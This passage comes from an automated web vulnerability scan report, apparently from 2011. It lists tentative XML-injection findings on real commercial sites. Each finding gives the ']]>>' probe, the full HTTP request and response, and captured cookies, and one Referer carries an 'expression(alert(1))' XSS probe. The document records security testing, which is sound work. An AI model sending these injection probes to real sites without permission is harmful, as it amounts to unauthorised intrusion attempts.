Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:23:44 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:23:46 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.12. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i]]>>/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:46 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:22:47 GMT
Pragma: no-cache
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.13. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /i/0RuFuATqDZ_452086828.html]]>>?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 404 Not Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:55 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:22:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10.14. http://controlcase.com/aboutUs_careers.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /aboutUs_careers.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /aboutUs_careers.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:46 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.15. http://controlcase.com/aboutUs_companybackground.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /aboutUs_companybackground.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /aboutUs_companybackground.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:31 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.16. http://controlcase.com/aboutUs_companybackground.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /aboutUs_companybackground.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /aboutUs_companybackground.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:38 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.17. http://controlcase.com/aboutUs_location.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /aboutUs_location.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /aboutUs_location.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:39 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.18. http://controlcase.com/articles.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /articles.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /articles.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:11 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.19. http://controlcase.com/asset_vulnerability_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /asset_vulnerability_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /asset_vulnerability_manager.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:32 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.20. http://controlcase.com/audit_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /audit_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /audit_manager.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:28 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.21. http://controlcase.com/certification_bits_shared_assessments.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /certification_bits_shared_assessments.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /certification_bits_shared_assessments.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:30 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.22. http://controlcase.com/certification_ei3pa.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /certification_ei3pa.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /certification_ei3pa.html]]>> HTTP/1.1
Host: controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://controlcase.com/contact.php?subject=Contact%20ControlCase89ec3%22%20style%3dx%3aexpression(alert(1))%201b20023cb56
Cookie: PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665227.1303665077; _pk_ses.3.4216=*; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmb=208121856.3.10.1303665078; __utmc=208121856; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:03 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.23. http://controlcase.com/certification_tg3.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /certification_tg3.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /certification_tg3.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:33 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.24. http://controlcase.com/certification_vulnerability_scans.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /certification_vulnerability_scans.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /certification_vulnerability_scans.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:53 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.25. http://controlcase.com/compliance_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /compliance_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /compliance_manager.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:20:05 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.26. http://controlcase.com/compliance_manager.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /compliance_manager.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /compliance_manager.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:26:22 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.27. http://controlcase.com/compliance_scanner.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /compliance_scanner.htm

Issue detail

